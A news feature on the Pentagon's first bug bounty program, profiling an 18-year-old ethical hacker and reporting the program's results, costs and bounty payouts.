Within 13 minutes of urging hackers to take their best shot at the Pentagon’s public websites, the US government’s first-ever bug bounty program had its first submission.
Just six hours later, hackers had already uncovered nearly 200 vulnerabilities in the Department of Defense’s networks.
Already a staple for companies such as Google and Facebook, the bug bounty program – which pays friendly hackers to do the sorts of things that recreational hackers might do for fun, and that criminals like to do for far more nefarious purposes – was so successful that Pentagon officials say that they are considering another bug bounty program for later this year. Other federal agencies, they add, would do well to follow their lead.
The chance to hack the feds drew a wide variety of comers, including David Dworken, 18, who has been a fan of bug bounty programs since middle school. He did it for the T-shirts initially.
"I probably spent about 20 hours on one because I thought they had a really cool t-shirt," he says. “I thought it was pretty awesome that you could get free T-shirts in the mail.”
Mr. Dworken signed up for an account with HackerOne, a firm that runs bug bounty programs, and gravitated toward companies that offer "Hall of Fame” listings on their websites in lieu of cash for finding bugs.
On the Netflix website, for instance, Dworken found that he could create a URL "that could display and do whatever I wanted. I could send it to you and if you were signed into Netflix, I could steal your account information,” he says. "The fact that software engineers at Netflix are making sure that's fixed is incredibly satisfying."
As he got more experience, he moved on to companies such as Uber, where he's earned $8,000 finding four bugs, "which is amazing,” Dworken says. “I do this because I think it's the right thing to do, but I really started to get to the point where I made a good chunk of change.”
Then, as he was getting a lift to school with his dad one morning, he heard about a bug bounty on National Public Radio. "We always listen to NPR in the car,” he says. It didn't take long for Dworken to set off on his most intriguing challenge to date: Hacking the Pentagon.
Not long after learning about the program, he received an email from HackerOne, which was running the Pentagon’s bug bounty. They wanted him to participate. "I was shocked, and unbelievably excited," he said.
There was just one snag. His Advanced Placement exams were happening at the same time. So he quickly got to work, reporting “four or five vulnerabilities within the first 12 hours of it opening," then got back to his studies.
"They were the standard web security vulnerabilities that are on pretty much any website unless they have a really good web security team – or a bug bounty," he said.
While these sorts of vulnerabilities are “shockingly common overall," the fact that they existed until recently on DOD websites was striking to Dworken. "Now, it’s raised the barrier to hacking into the Pentagon, which is absolutely an amazing thing," he says. "This may sound cheesy, but it's a way to serve my country from the comfort of my computer.”
Defense officials are counting on this kind of patriotic spirit, and the cache of getting to hack, well, the Pentagon.
“A lot of hackers, like myself, will choose to help – and not just for the money, but for recognition. This is a historic program,” Kate Moussouris, currently an independent security consultant and former chief policy officer at HackerOne, told reporters in April. “The prestige of being part of the very first program for the US government is also commodity in and of itself.”
And that saves the Pentagon money – the bug bounty pilot program cost $150,000.
“It’s not a small sum but if we had gone through the normal process of hiring an outside firm to do a security audit and vulnerability assessment, which is what we usually do, it would have cost us over $1 million,” said Defense Secretary Ash Carter.
The DOD paid $5 million over three years to one vendor, which found less than 10 vulnerabilities.
These public bug bounty programs do not throw open the Pentagon’s flood gates to let hackers poke around its Secret Internet Protocol Router Network, or SIPRNet, or even the sensitive-but-unclassified Non-Secure Internet Protocol Router Network, or NIPRNet.
Instead, these are programs to sweep up the admittedly low-hanging fruit – such as where to go rent canoes as part of a military recreation website – that offer all too enticing opportunities for “embarrassment through defacement,” as defense officials put it. The Pentagon runs roughly 450 of these websites.
In total, 1,400 eligible ethical hackers – otherwise known as "white hats" – were invited to take part in the program, and more than 250 of them found and submitted at least one vulnerability. Of these, 138 were found to be “legitimate, unique, and eligible for a bounty,” said Secretary Carter.
Equally important, by allowing outside hackers to find holes and vulnerabilities, it frees up the US military’s own cyberspecialists “to spend more time fixing them than finding them,” Carter added. “The pilot showed us one way to streamline what we do to defend out networks and correct vulnerabilities more quickly.”
The highest individual bounty was $3,500; the average was $588. The top-earning hacker made $15,000.
Dworken didn’t make any actual money, since other bug bounty hackers had already discovered the vulnerabilities he reported. But the experience made for good public service and a considerable resume builder.
He also got a trip to the Pentagon to meet Carter. “I’d never been to the Pentagon, despite living in DC and driving past it 10,000 times.”
This fall, he is headed to Northeastern University in Boston to study computer science, with a focus on cybersecurity. Before that, though, he’s spending a month this summer hiking the Appalachian Trail by himself. During that time, he says, “I’m mostly checking out of technology.”